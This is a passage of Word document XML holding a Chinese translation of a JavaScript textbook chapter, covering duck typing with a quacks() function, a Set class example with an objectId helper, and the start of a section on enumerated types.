        <w:t>switch(typeof arg){//</w:t>
      </w:r>
      <w:r>
        <w:t>如果参数是：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>case'string'://string:</w:t>
      </w:r>
      <w:r>
        <w:t>直接用名字做检查</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(typeof o[arg]!=="function")return false;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>continue;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>case'function'://function:</w:t>
      </w:r>
      <w:r>
        <w:t>检查函数的原型对象上的方法</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>如果实参是函数</w:t>
      </w:r>
      <w:r>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:t>则使用它的原型</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>arg=arg.prototype;//</w:t>
      </w:r>
      <w:r>
        <w:t>进入下一个</w:t>
      </w:r>
      <w:r>
        <w:t>case</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>case'object'://object:</w:t>
      </w:r>
      <w:r>
        <w:t>检查匹配的方法</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>for(var m in arg){//</w:t>
      </w:r>
      <w:r>
        <w:t>遍历对象的每个属性</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(typeof arg[m]!=="function")continue;//</w:t>
      </w:r>
      <w:r>
        <w:t>跳过不是方法的属性</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(typeof o[m]!=="function")return false;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如果程序能执行到这里，说明</w:t>
      </w:r>
      <w:r>
        <w:t>o</w:t>
      </w:r>
      <w:r>
        <w:t>实现了所有的方法</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>return true;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关于这个</w:t>
      </w:r>
      <w:r>
        <w:t>quac</w:t>
      </w:r>
      <w:r>
        <w:t>ks()</w:t>
      </w:r>
      <w:r>
        <w:t>函数还有一些地方是需要尤为注意的。首先，这里只是通过特定的名称来检测对象是否含有一个或多个值为函数的属性。我们无法得知这些已经存在的属性的细节信息，比如，函数是干什么用的？它们需要多少参数？参数类型是什么？然而这是鸭式辩型的本质所在，如果使用鸭式辩型而不是强制的类型检测的方式定义</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>，那么创建的</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>应当更具灵活性才可以，这样才能确保你提供给用户的</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>更加安全可靠。关于</w:t>
      </w:r>
      <w:r>
        <w:t>quacks()</w:t>
      </w:r>
      <w:r>
        <w:t>函数还有另一问题需要注意，就是它不能应用于内置类。比如，不能通过</w:t>
      </w:r>
      <w:r>
        <w:t>quacks(o,Array)</w:t>
      </w:r>
      <w:r>
        <w:t>来检测</w:t>
      </w:r>
      <w:r>
        <w:t>o</w:t>
      </w:r>
      <w:r>
        <w:t>是否实现了</w:t>
      </w:r>
      <w:r>
        <w:t>Array</w:t>
      </w:r>
      <w:r>
        <w:t>中所有同名的方法。原因是内置类的方法都是不可枚举的，</w:t>
      </w:r>
      <w:r>
        <w:t>quacks()</w:t>
      </w:r>
      <w:r>
        <w:t>中的</w:t>
      </w:r>
      <w:r>
        <w:t>for/in</w:t>
      </w:r>
      <w:r>
        <w:t>循环无法遍历到它们（注意，在</w:t>
      </w:r>
      <w:r>
        <w:t>ECMAScript 5</w:t>
      </w:r>
      <w:r>
        <w:t>中有一个补救办法，就是使用</w:t>
      </w:r>
      <w:r>
        <w:t>Ojbect.getOwnPropertyNames()</w:t>
      </w:r>
      <w:r>
        <w:t>）。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="235" w:name="9_6_JavaScriptZhong_De_Mian_Xiang_Dui_Xi"/>
      <w:r>
        <w:t>9.6</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>中的面向对象技术</w:t>
      </w:r>
      <w:bookmarkEnd w:id="235"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>到目前为止，我们讨论了</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>中类的基础知识：原型对象的重要性、它和构造函数之间的联系、</w:t>
      </w:r>
      <w:r>
        <w:t>instanceof</w:t>
      </w:r>
      <w:r>
        <w:t>运算符如何工作等。本节将目光转向一些实际的例子（尽管这不是基础知识），包括如何利用</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>中的类进行编程。我们从两个重要的例子开始，这两个例子中实现的类非常有意思，接下来的讨论都将基于此作展开。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="319" w:after="319"/>
      </w:pPr>
      <w:bookmarkStart w:id="236" w:name="9_6_1_Yi_Ge_Li_Zi__Ji_He_Lei_"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>9.6.1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　一个例子：集合类</w:t>
      </w:r>
      <w:bookmarkEnd w:id="236"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>集合（</w:t>
      </w:r>
      <w:r>
        <w:t>set</w:t>
      </w:r>
      <w:r>
        <w:t>）是一种数据结构，用以表示非重复值的无序集合。集合的基础方法包括添加值、检测值是否在集合中，这种集合需要一种通用的实现，以保证操作效率。</w:t>
      </w:r>
      <w:r>
        <w:t>Jav</w:t>
      </w:r>
      <w:r>
        <w:t>aScript</w:t>
      </w:r>
      <w:r>
        <w:t>的对象是属性名以及与之对应的值的基本集合。因此将对象只用做字符串的集合是大材小用。例子</w:t>
      </w:r>
      <w:r>
        <w:t>9-6</w:t>
      </w:r>
      <w:r>
        <w:t>用</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>实现了一个更加通用的</w:t>
      </w:r>
      <w:r>
        <w:t>Set</w:t>
      </w:r>
      <w:r>
        <w:t>类，它实现了从</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>值到唯一字符串的映射，然后将字符串用做属性名。对象和函数都不具备如此简明可靠的唯一字符串表示。因此集合类必须给集合中的每一个对象或函数定义一个唯一的属性标识。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>例</w:t>
      </w:r>
      <w:r>
        <w:t>9-6</w:t>
      </w:r>
      <w:r>
        <w:t>：</w:t>
      </w:r>
      <w:r>
        <w:t>Set.js</w:t>
      </w:r>
      <w:r>
        <w:t>：值的任意集合</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>function Set(){//</w:t>
      </w:r>
      <w:r>
        <w:t>这是一个构造函数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>this.values={};//</w:t>
      </w:r>
      <w:r>
        <w:t>集合数据保存在对象的属性里</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>this.</w:t>
      </w:r>
      <w:r>
        <w:t>n=0;//</w:t>
      </w:r>
      <w:r>
        <w:t>集合中值的个数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>this.add.apply(this,arguments);//</w:t>
      </w:r>
      <w:r>
        <w:t>把所有参数都添加进这个集合</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>将每个参数都添加至集合中</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>Set.prototype.add=function(){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>for(var i=0;i</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>arguments.length;i++){//</w:t>
      </w:r>
      <w:r>
        <w:t>遍历每个参数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var val=arguments[i];//</w:t>
      </w:r>
      <w:r>
        <w:t>待添加到集合中的值</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var str=Set._v2s(val);//</w:t>
      </w:r>
      <w:r>
        <w:t>把它转换为字符串</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(!this.values.hasOwnProperty(str)){//</w:t>
      </w:r>
      <w:r>
        <w:t>如果不在集合中</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>this.values[str]=val;//</w:t>
      </w:r>
      <w:r>
        <w:t>将字符串和值对应起来</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>this.n++;//</w:t>
      </w:r>
      <w:r>
        <w:t>集合中值的计数加一</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>return this;//</w:t>
      </w:r>
      <w:r>
        <w:t>支持链式方法调用</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>};//</w:t>
      </w:r>
      <w:r>
        <w:t>从集合删除元素，这些元素由参数指定</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>Set.prototype.remove=function(){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>for(var i=0;i</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>arguments.length;i++){//</w:t>
      </w:r>
      <w:r>
        <w:t>遍历每个参数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var str=Set._v2s(arguments[</w:t>
      </w:r>
      <w:r>
        <w:t>i]);//</w:t>
      </w:r>
      <w:r>
        <w:t>将字符串和值对应起来</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(this.values.hasOwnProperty(str)){//</w:t>
      </w:r>
      <w:r>
        <w:t>如果它在集合中</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>delete this.values[str];//</w:t>
      </w:r>
      <w:r>
        <w:t>删除它</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>this.n--;//</w:t>
      </w:r>
      <w:r>
        <w:t>集合中值的计数减一</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>return this;//</w:t>
      </w:r>
      <w:r>
        <w:t>支持链式方法调用</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>};//</w:t>
      </w:r>
      <w:r>
        <w:t>如果集合包含这个值，则返回</w:t>
      </w:r>
      <w:r>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:t>；否则，返回</w:t>
      </w:r>
      <w:r>
        <w:t>false</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>Set.prototype.contains=function(value){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>return this.values.hasOwnProperty(Set._v2s</w:t>
      </w:r>
      <w:r>
        <w:t>(value));</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>};//</w:t>
      </w:r>
      <w:r>
        <w:t>返回集合的大小</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>Set.prototype.size=function(){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>return this.n;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>};//</w:t>
      </w:r>
      <w:r>
        <w:t>遍历集合中的所有元素，在指定的上下文中调用</w:t>
      </w:r>
      <w:r>
        <w:t>f</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>Set.prototype.foreach=function(f,context){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>for(var s in this.values)//</w:t>
      </w:r>
      <w:r>
        <w:t>遍历集合中的所有字符串</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(this.values.hasOwnProperty(s))//</w:t>
      </w:r>
      <w:r>
        <w:t>忽略继承的属性</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>f.call(context,this.values[s]);//</w:t>
      </w:r>
      <w:r>
        <w:t>调用</w:t>
      </w:r>
      <w:r>
        <w:t>f</w:t>
      </w:r>
      <w:r>
        <w:t>，传入</w:t>
      </w:r>
      <w:r>
        <w:t>value</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>};//</w:t>
      </w:r>
      <w:r>
        <w:t>这是一个内部函数，用以将任意</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>值和唯一的字符串对应起来</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>Set._v2s=function(val){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>switch(val){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>case undefined:return'u';//</w:t>
      </w:r>
      <w:r>
        <w:t>特殊的原始值</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>case null:return'n';//</w:t>
      </w:r>
      <w:r>
        <w:t>值只有一个字母</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>case true:return't';//</w:t>
      </w:r>
      <w:r>
        <w:t>代码</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>case false:return'f';</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>default:switch(typeof val){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>case'number':return'#'+val;//</w:t>
      </w:r>
      <w:r>
        <w:t>数字都带有</w:t>
      </w:r>
      <w:r>
        <w:t>#</w:t>
      </w:r>
      <w:r>
        <w:t>前缀</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>case'string':return'"'+val;//</w:t>
      </w:r>
      <w:r>
        <w:t>字符串都带有</w:t>
      </w:r>
      <w:r>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:t>前缀</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>default:return'@'+objectId(val);//Objs and funcs get@</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>对任意对象来说，都会返回一个字符串</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>针对不同的对象，这个函数会返回不同的字符串</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>对于同一个对象的多次调用，总是返回相同的字符串</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>为了做到这一点，它给</w:t>
      </w:r>
      <w:r>
        <w:t>o</w:t>
      </w:r>
      <w:r>
        <w:t>创建了一个属性，在</w:t>
      </w:r>
      <w:r>
        <w:t>ES5</w:t>
      </w:r>
      <w:r>
        <w:t>中，这个属性是不可枚举且是只读的</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">function </w:t>
      </w:r>
      <w:r>
        <w:t>objectId(o){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var prop="|**objectid**|";//</w:t>
      </w:r>
      <w:r>
        <w:t>私有属性，用以存放</w:t>
      </w:r>
      <w:r>
        <w:t>id</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>if(!o.hasOwnProperty(prop))//</w:t>
      </w:r>
      <w:r>
        <w:t>如果对象没有</w:t>
      </w:r>
      <w:r>
        <w:t>id</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>o[prop]=Set._v2s.next++;//</w:t>
      </w:r>
      <w:r>
        <w:t>将下一个值赋给它</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>return o[prop];//</w:t>
      </w:r>
      <w:r>
        <w:t>返回这个</w:t>
      </w:r>
      <w:r>
        <w:t>id</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>};</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>Set._v2s.next=100;//</w:t>
      </w:r>
      <w:r>
        <w:t>设置初始</w:t>
      </w:r>
      <w:r>
        <w:t>id</w:t>
      </w:r>
      <w:r>
        <w:t>的值</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="319" w:after="319"/>
      </w:pPr>
      <w:bookmarkStart w:id="237" w:name="9_6_2_Yi_Ge_Li_Zi__Mei_Ju_Lei_Xing_"/>
      <w:r>
        <w:t>9.6.2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　一个例子：枚举类型</w:t>
      </w:r>
      <w:bookmarkEnd w:id="237"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>枚举类型（</w:t>
      </w:r>
      <w:r>
        <w:t>enumerated type</w:t>
      </w:r>
      <w:r>
        <w:t>）是一种类型，它是值的有限集合，如果值定义为这个类型则该值是可列出（或</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>可枚举</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>）的。在</w:t>
      </w:r>
      <w:r>
        <w:t>C</w:t>
      </w:r>
      <w:r>
        <w:t>及其派生语言中，枚举类型是通过关键字</w:t>
      </w:r>
      <w:r>
        <w:t>enum</w:t>
      </w:r>
      <w:r>
        <w:t>声明的。</w:t>
      </w:r>
      <w:r>
        <w:t>Enum</w:t>
      </w:r>
      <w:r>
        <w:t>是</w:t>
      </w:r>
      <w:r>
        <w:t>ECMAScript 5</w:t>
      </w:r>
      <w:r>
        <w:t>中的保留字（还未使用），很有可能在将来</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>就会内置支持枚举类型。到那时，例</w:t>
      </w:r>
      <w:r>
        <w:t>9-7</w:t>
      </w:r>
      <w:r>
        <w:t>展示了如何在</w:t>
      </w:r>
      <w:r>
